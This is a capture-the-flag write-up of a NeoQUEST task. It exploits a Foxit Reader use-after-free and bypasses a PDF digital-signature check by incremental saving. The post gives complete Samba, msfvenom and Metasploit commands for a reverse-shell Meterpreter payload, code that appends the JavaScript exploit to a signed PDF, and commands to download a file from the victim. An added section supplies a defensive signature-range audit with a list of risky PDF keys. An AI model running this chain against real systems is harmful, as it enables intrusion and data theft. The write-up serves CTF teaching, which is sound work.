Exploiting the Foxit Reader vulnerability and bypassing the digital signature: the NeoQUEST-2020 task as an example

Today we will talk about the most difficult task of NeoQUEST-2019 and NeoQUEST-2020. Yes, the same one, with digital signatures and exploitation of a Foxit Reader vulnerability. And yes, there really are two versions of this task, and in this article we will finally analyze it properly. Details under the cut 🙂

Initially, the task was designed for the NeoQUEST-2019 face-to-face contest, but it remained unsolved there. We modified it a little and offered it to the participants of the NeoQUEST-2020 online stage. However, our changes did not affect the difficulty of the task: only 2 people solved it!
So, the first version was meant to be solved on a local network, and the second on the public Internet, which requires some changes to the exploit and its shellcode.
In the NeoQUEST-2020 legend, participants were given an IP address; visiting it showed an application submission form, a list of requirements for applications, and an example of a correct application. First of all, we carefully study the example application: what if there is something interesting in it? And indeed, we immediately notice a detail:

It looks like Foxit Reader 9.0.1 is in use here. We are given the software name and its version, hmmm... Could there be a vulnerability? And indeed there is: this version has a use-after-free vulnerability, CVE-2018-9958. An exploit for it is in Metasploit (which is already half the battle, isn't it?), so why not try it?
This vulnerability allows running files from remote SMB shares. Let's consider exploiting it using the original 2019 task as an example.

So, in 2019 the application submission form was located at 192.168.108.129. First of all, launch Kali Linux. You also need to set up a share from which the main payload, Meterpreter, will be run. To do this, install or update the Samba server:

sudo apt-get install samba

Then create the folder that we will share:

mkdir /mnt/files
sudo chmod 777 /mnt/files

Now you need to configure the Samba server. To do this, open the configuration file /etc/samba/smb.conf and paste the following text there:

[global]
security = user
workgroup = MYGROUP
server string = Samba
guest account = nobody
map to guest = Bad User

[share]
path = /mnt/files
browseable = Yes
guest ok = Yes
writeable = Yes
public = yes

The last thing to do is restart the Samba services:

service smbd restart
service nmbd restart

That's all. Now the contents of the /mnt/files folder are available at \\192.168.108.130\share.
The next step is to prepare the exploit itself. To do this, generate the Meterpreter payload and put it on the share:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.108.130 LPORT=4444 --arch x86 -f exe -o /mnt/files/exploit.exe
sudo chmod 777 /mnt/files/exploit.exe

Now create an exploit PDF file:

msfconsole
use exploit/windows/fileformat/foxit_reader_uaf
set LHOST 192.168.108.130
set EXENAME exploit.exe
set SHARE share
run

Start a handler that will accept the connection from Meterpreter when it runs on the victim machine:

use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.108.130
set EXITONSESSION false
run -j

That's all! In the 2020 version of the task, this approach will not work (unless you have an external IP on which you can host the SMB share). Therefore, to complete the task in the online stage, you need to analyze the exploit and replace its payload with shellcode that implements, for example, a reverse shell (if you have an external IP) or a bind shell. We suggest you try exploiting the vulnerability yourself, because doing it once is better than reading about it a hundred times!

It remains to upload the created PDF document to the application acceptance system, and...

...nothing happens, because the file is not signed! It seems the system checks the signature by some additional means before the document is opened in Foxit Reader. So we need to figure out how to bypass the signature check.

The three most recent signature bypass techniques for PDF files are covered by CVE-2018-16042, CVE-2018-18688, and CVE-2018-18689. Fortunately, the team of researchers who discovered these vulnerabilities published sample PDFs for testing. Let's check how the system responds to each attack.
Universal Signature Forgery attack: the system reacts exactly as it does to an unsigned file. It seems the signature is simply not recognized.
Signature Wrapping attack: the same result, the attack does not work.
And here is the Incremental Saving attack:

We are almost there! The system checked the signature and reported that it does not belong to a company employee. But we have an example of a document signed by an employee! So all that remains is a bit of sleight of hand: use Incremental Saving to embed the exploit without breaking the signature.

You can write your own library for low-level work with PDF (as the task author intended) or simply append the exploit to the end of the file (as the tester did when checking the task). If you look at the structure of the exploit PDF, it becomes clear that it consists of two objects: the JavaScript code that triggers the use-after-free and runs the exe file from the share, and the catalog, the root object of the PDF file, which sets the action performed when the document is opened, namely invoking the JavaScript. So you need to add an object with the JavaScript code to the signed document and update the catalog object. This can be done as follows:

# PDF, Object and ObjectReference come from the author's own PDF library (see above)
doc = PDF('example.pdf')                   # the example application signed by an employee
js_exploit = "...lots of JS code here..."  # JavaScript taken from the Metasploit module

# Redefine the catalog (object 13) with an OpenAction pointing at the JS object
obj_1 = Object({'OpenAction': ObjectReference(28),
                'AcroForm': ObjectReference(15),
                'Pages': ObjectReference(1),
                'PageLayout': '/OneColumn',
                'Type': '/Catalog'
                }, id=13)
doc.update_object(obj_1, 1)

# New JavaScript action object that the OpenAction above refers to
obj_2 = Object({'S': '/JavaScript',
                'JS': js_exploit
                })
doc.add_new_object(obj_2)

# Save as an incremental update: the originally signed bytes stay untouched
doc.save(root_id=13)

What do we see? The document successfully passes the signature check! After that, a new Meterpreter session is established, which means the exploit works (sometimes not on the first try, due to the probabilistic nature of the use-after-free).
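The check the application system should have performed, as an added example that is not part of the original writeup or the task's code: read each signature's /ByteRange, report any bytes that lie beyond the signed range, and look in that unsigned tail for a redefined catalog, an /OpenAction or JavaScript, which is exactly what the incremental update above adds. The tiny "signed" PDF and the appended revision are constructed inline; the /Contents value is a dummy, not a real signature.

```python
import re

# Constructed sample of a tiny "signed" PDF.  The /ByteRange uses fixed-width
# digits so patching in the real offsets shifts nothing (real signers do the
# same).  /Contents is a dummy hex string; only the byte-range bookkeeping matters.
def build_signed_sample():
    placeholder = b"/ByteRange [0000000000 0000000000 0000000000 0000000000]"
    contents = b"/Contents <" + b"00" * 8 + b">"
    body = (b"%PDF-1.7\n"
            b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
            b"4 0 obj << /Type /Sig " + placeholder + b" " + contents + b" >> endobj\n"
            b"trailer << /Root 1 0 R >>\nstartxref\n0\n%%EOF\n")
    gap_start = body.index(contents) + len(b"/Contents ")     # offset of '<'
    gap_end = gap_start + len(contents) - len(b"/Contents ")  # just past '>'
    rng = b"/ByteRange [%010d %010d %010d %010d]" % (
        0, gap_start, gap_end, len(body) - gap_end)
    return body.replace(placeholder, rng)

# Constructed incremental update in the spirit of the attack described above: a
# new revision redefines the catalog with an /OpenAction that runs JavaScript,
# while the signed first revision is left byte-for-byte intact.
INCREMENTAL_UPDATE = (
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R >> endobj\n"
    b"5 0 obj << /S /JavaScript /JS (app.alert('constructed sample')) >> endobj\n"
    b"trailer << /Root 1 0 R /Prev 0 >>\nstartxref\n0\n%%EOF\n"
)

BYTERANGE_RE = re.compile(rb"/ByteRange\s*\[\s*(\d+)\s+(\d+)\s+(\d+)\s+(\d+)\s*\]")
# Keys in an unsigned revision that change what the viewer does with the "unchanged" document
RISKY_PATTERNS = [rb"/Type\s*/Catalog", rb"/OpenAction", rb"/AA\b", rb"/JavaScript", rb"/JS\b"]

def signature_coverage_end(pdf):
    """Highest offset covered by any /ByteRange, or None if there is no signature."""
    ends = [int(m.group(3)) + int(m.group(4)) for m in BYTERANGE_RE.finditer(pdf)]
    return max(ends) if ends else None

def audit_signed_pdf(pdf):
    """Describe the bytes beyond the signed range and flag risky keys found in them."""
    end = signature_coverage_end(pdf)
    if end is None:
        return {"signed": False, "trailing_bytes": 0, "extra_revisions": 0, "risky": []}
    tail = pdf[end:]
    risky = []
    for pattern in RISKY_PATTERNS:
        m = re.search(pattern, tail)
        if m:
            risky.append(m.group(0).decode())
    return {"signed": True, "trailing_bytes": len(tail),
            "extra_revisions": tail.count(b"%%EOF"), "risky": risky}
```

Incremental updates after signing are legitimate in PDF (a second signature, form filling), so trailing bytes alone are a prompt to inspect the new revision rather than proof of tampering. A viewer's "signature valid" verdict covers only the bytes inside the ByteRange, which is why the application system above was fooled.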

Now you can use Meterpreter to find and download the nq2020_key.txt file:

sessions -i 1
search -f nq2020_key.txt
download 'C:\Users\manager\Downloads\nq2020_key.txt'

Hooray, fanfare and applause! We finally got the key! It was difficult, but nothing is impossible for our participants; we have been convinced of this for many years!
We have told all the secrets of the NeoQUEST-2020 online stage tasks, but this does not mean we will not see you this year: on September 30th the traditional face-to-face contest will take place in St. Petersburg!
We will hold the final of the hacker competition and talk about the most interesting news in the world of cybersecurity. Cool talks, informative workshops, a Telegram quiz, gifts and much more: all this awaits you soon! See you 🙂
